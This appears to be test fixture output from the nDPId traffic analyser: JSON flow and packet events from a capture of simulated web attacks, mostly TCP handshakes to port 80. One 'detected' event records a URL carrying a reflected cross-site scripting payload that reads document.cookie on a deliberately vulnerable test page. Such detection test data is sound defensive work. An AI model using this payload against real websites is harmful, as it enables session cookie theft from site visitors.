+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":3,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DbZAAD4GuCKsEAABwKgKMoWwAFC\/7poLIVafcIAQAOVYFgAAAQEICgE8l78D5mkz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347935445,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347935445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lcJAAD4GMA6sEAABwKgKMoW+AFC8fgzAAAAAAKACchB1eAAAAgQFtAQCCAoBPJkCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":2,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhb4dfTaTvH4MwaAScSCz6gAAAgQFtAQCCAoD5mp2ATyZAgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":3,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lcNAAD4GMBWsEAABwKgKMoW+AFC8fgzBHX02lIAQAOVS8gAAAQEICgE8mQID5mp2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347936727,"flow_last_seen":1499347936727,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1499347936727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IMJAAD4GpQ6sEAABwKgKMoXMAFAQdrqBAAAAAKACchBycAAAAgQFtAQCCAoBPJpDAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":2,"flow_last_seen":1499347936727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhcyowg88EHa6gqAScSBLswAAAgQFtAQCCAoD5mu3ATyaQwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":3,"flow_last_seen":1499347936728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347936728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IMNAAD4GpRWsEAABwKgKMoXMAFAQdrqCqMIPPYAQAOXqugAAAQEICgE8mkMD5mu3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":3,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06PBAAD4G3OesEAABwKgKMoXmAFBSpnQuJ4Yss4AQAOVNjQAAAQEICgE8nMID5m42"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347940593,"flow_last_seen":1499347940593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347940593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":3,"flow_last_seen":1499347943147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347943147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TwRAAD4GdtSsEAABwKgKMoYOAFBjnu+FE+7OhoAQAOUrTgAAAQEICgE8oIgD5nH8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347944440,"flow_last_seen":1499347944440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347944440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1499347944440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SUNAAD4GfI2sEAABwKgKMoYcAFB5iuiIAAAAAKACchDTfAAAAgQFtAQCCAoBPKHLAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":2,"flow_last_seen":1499347944440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhhyVeGrjeYroiaAScSBc2gAAAgQFtAQCCAoD5nM\/ATyhywEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":3,"flow_last_seen":1499347944441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347944441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SURAAD4GfJSsEAABwKgKMoYcAFB5iuiJlXhq5IAQAOX74QAAAQEICgE8ocsD5nM\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347945720,"flow_last_seen":1499347945720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347945720,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1499347945720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sjdAAD4GE5msEAABwKgKMoYqAFDdpBE8AAAAAKACchBFYQAAAgQFtAQCCAoBPKMLAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":1499347945720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhiqh1kGM3aQRPaAScSDqdwAAAgQFtAQCCAoD5nR\/ATyjCwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":1499347945721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347945721,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sjhAAD4GE6CsEAABwKgKMoYqAFDdpBE9odZBjYAQAOWJfwAAAQEICgE8owsD5nR\/"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 